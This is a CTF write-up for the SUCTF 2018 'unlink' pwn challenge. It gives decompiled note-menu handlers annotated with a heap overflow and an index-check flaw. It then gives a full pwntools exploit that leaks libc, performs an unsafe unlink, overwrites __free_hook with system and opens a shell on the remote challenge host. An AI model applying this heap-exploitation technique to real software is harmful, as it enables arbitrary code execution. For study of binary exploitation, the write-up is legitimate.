[SUCTF 2018 招新赛]unlink


// Decompiled (IDA pseudo-C) handler for menu option 2: free one note slot.
// `buf` is a global table of note pointers (indices 0..9 per the range check
// below); its definition is outside this listing.
unsigned __int64 delete()
{
  int v1; // [rsp+4h] [rbp-Ch] BYREF  -- user-supplied slot index
  unsigned __int64 v2; // [rsp+8h] [rbp-8h]  -- saved stack canary

  v2 = __readfsqword(0x28u); // load the stack canary from fs:0x28
  puts("which node do you want to delete");
  __isoc99_scanf("%d", &v1);
  // Review note: (&buf)[v1] is read BEFORE v1 is range-checked. `&&` evaluates
  // left to right, so an out-of-range v1 indexes outside the table. A defensive
  // version tests 0 <= v1 <= 9 first and only then dereferences the slot.
  if ( (&buf)[v1] != 0LL && v1 >= 0 && v1 <= 9 )
  {
    free((&buf)[v1]);
    (&buf)[v1] = 0LL; // slot is cleared after free, so this path leaves no dangling pointer (no UAF)
  }
  return __readfsqword(0x28u) ^ v2; // canary check: non-zero means the frame was smashed
}

Problem: [SUCTF 2018 招新赛]unlink

没有UAF

libc版本2.23很低 没有tcache

// Decompiled (IDA pseudo-C) handler for menu option 4: overwrite one note's content.
// `buf` is the global note-pointer table (indices 0..9); definition not in this listing.
unsigned __int64 take_note()
{
  int v1; // [rsp+4h] [rbp-Ch] BYREF  -- user-supplied slot index
  unsigned __int64 v2; // [rsp+8h] [rbp-8h]  -- saved stack canary

  v2 = __readfsqword(0x28u); // load the stack canary from fs:0x28
  puts("which one do you want modify :");
  __isoc99_scanf("%d", &v1);
  // Same ordering flaw as delete(): the slot is dereferenced before v1 is range-checked.
  if ( (&buf)[v1] != 0LL && v1 >= 0 && v1 <= 9 )
  {
    puts("please input the content");
    // Root cause of the heap overflow: the read length is a fixed 0x100 bytes,
    // independent of the size the note was allocated with (the script below
    // allocates 0x10- and 0x80-byte notes). The fix is to bound this read by
    // the slot's allocation size; the decompilation does not show that size
    // being recorded anywhere, so it would have to be tracked per slot.
    read(0, (&buf)[v1], 0x100uLL);
  }
  return __readfsqword(0x28u) ^ v2; // canary check
}

写入长度固定为 0x100（与申请大小无关），存在堆溢出

from pwn import *
from LibcSearcher import *

# Session setup: verbose pwntools logging, 64-bit target, remote service endpoint.
HOST, PORT = "node4.anna.nssctf.cn", 28846
context(log_level='debug', arch='amd64')
io = remote(HOST, PORT)
# io = process("./service")  # local alternative
e = ELF('./service')
# libc matching the challenge (2.23, no tcache), used for symbol offsets.
libc = ELF('/home/rick/glibc-all-in-one/libs/2.23-0ubuntu11.3_amd64/libc-2.23.so')

def get_addr():
    """Read up to the first 0x7f byte and unpack the trailing 6 bytes as a little-endian address."""
    raw = io.recvuntil(b'\x7f')
    tail = raw[-6:]
    return u64(tail.ljust(8, b'\x00'))

def bug():
    """Attach a debugger to the running tube (manual debugging aid, not called automatically)."""
    attach(io)

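# Thin I/O aliases over the pwntools tube `io`.
# The original bound `sla` twice (first to sendafter, then to sendlineafter);
# only the second binding survived, so the sendafter wrapper was unreachable.
# It is now exposed as `sa`, matching the common naming next to `sla`.
s    = lambda data              : io.send(data)                  # raw send
sa   = lambda delim, data       : io.sendafter(delim, data)      # wait for delim, then send
sl   = lambda data              : io.sendline(data)              # send plus newline
sla  = lambda delim, data       : io.sendlineafter(delim, data)  # wait for delim, then sendline
r    = lambda num               : io.recv(num)                   # receive up to num bytes
ru   = lambda delims, drop=True : io.recvuntil(delims, drop)     # receive through delims
itr  = lambda                   : io.interactive()
uu32 = lambda data              : u32(data.ljust(4, b'\x00'))    # unpack <= 4 bytes, zero-padded
uu64 = lambda data              : u64(data.ljust(8, b'\x00'))    # unpack <= 8 bytes, zero-padded
ls   = lambda data              : log.success(data)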


def add(size):
    """Menu option 1: allocate a note of `size` bytes."""
    sla(b"chooice :", "1")
    sla(b"size :", str(size))

def delete(idx):
    """Menu option 2: free the note in slot `idx`."""
    sla(b"chooice :", "2")
    sla(b"to delete", str(idx))

def show(idx):
    """Menu option 3: print the note in slot `idx`."""
    sla(b"chooice :", "3")
    sla(b"to show", str(idx))

def edit(idx, content):
    """Menu option 4: overwrite the note in slot `idx` with `content` (a trailing newline is sent too)."""
    sla(b"chooice :", "4")
    sla(b"odify :\n", str(idx))
    sla(b"the content", content)

# --- Exploit sequence. The heap layout is order-sensitive; do not reorder. ---
# Slot 0 is a 0x10-byte note, slots 1..3 are 0x80-byte notes. With glibc 2.23
# there is no tcache, so a freed 0x80-byte chunk lands in the unsorted bin.
add(0x10)
add(0x80)
add(0x80)  # slot 2
add(0x80)  # slot 3



# Presumably the address of the global note-pointer table `buf` in .bss
# (the unlink arithmetic below only works if it is) — confirm against the binary.
bss = 0x6020c0

delete(1)  # slot 1 -> unsorted bin; its fd/bk now hold libc (main_arena) pointers

# take_note() reads 0x100 bytes regardless of the 0x10 allocation, so 0x20 bytes
# written through slot 0 reach slot 1's fd field; because edit() uses sendline,
# the trailing '\n' (0x0a) also lands on fd's low byte. show(0) then prints past
# the padding and leaks the clobbered fd.
edit(0,b'a'*0x20)
show(0)
ru(b"a"*0x20)
# Author's note: the "- 2" and the __realloc_hook reference were worked out in gdb.
leak_libc = uu64(r(6)) - 2 - libc.sym["__realloc_hook"]
# Restore fd/bk: the arithmetic (0x6e + 0x0a == 0x78) says the newline turned the
# original low byte 0x78 into 0x0a, so adding 0x6e back yields the real fd value.
offset = leak_libc + 2 + libc.sym["__realloc_hook"] + 0x6e
# Rewrite slot 1's chunk header (prev_size 0, size 0x91) and fd/bk in place.
edit(0,b'a'*0x10+p64(0)+p64(0x91)+p64(offset)+p64(offset))
ls("libc_base=>"+hex(leak_libc))
offset_bss = bss + len(p64(0))*3  # bss + 0x18

# Fake chunk at the start of slot 2's data: header (0, 0x81), then fd/bk chosen so
# glibc's safe-unlink check (FD->bk == P and BK->fd == P) holds for P = offset_bss - 8,
# i.e. the table entry that holds slot 2's pointer. The 0x60 filler reaches slot 3's
# header, which is rewritten as prev_size 0x80 / size 0x90 (prev_inuse clear) so that
# freeing slot 3 consolidates backwards and unlinks the fake chunk.
payload = p64(0)+p64(0x81)+p64(offset_bss-0x20)+p64(offset_bss-0x18)+b'a'*0x60+p64(0x80)+p64(0x90)
edit(2,payload)
delete(3)
# After the unlink, slot 2's pointer is redirected into the table itself (P - 0x18).
# The author's note read "idx3 -> 0x6060b8"; with bss = 0x6020c0 that looks like a
# typo for 0x6020b8 (bss - 8) — verify in a debugger.
payload = b'a'*8+p64(leak_libc+libc.sym["__free_hook"])  # 8 filler bytes, then slot 0 := &__free_hook

edit(2,payload)
#attach(io)
payload = p64(leak_libc+libc.sym["system"])

edit(0,payload)  # slot 0 now points at __free_hook, so this writes system() into it
add(0x10)        # purpose not evident from the listing; presumably fills the first empty slot — confirm
edit(2,b'/bin/sh\x00')  # the string is placed wherever slot 2 now points (see note above)
delete(2)        # free(slot 2) -> __free_hook -> system("/bin/sh")
#attach(io)




io.interactive()

打unsortbin unlink

之前尝试打了_malloc_hook 的 one_gadget 三个打不进去

_free_hook 的 fake fastbin 一直报错

打unlink 后的 直接写got表还疯狂接收出错

flag 不是直接在根目录 在~/flag.txt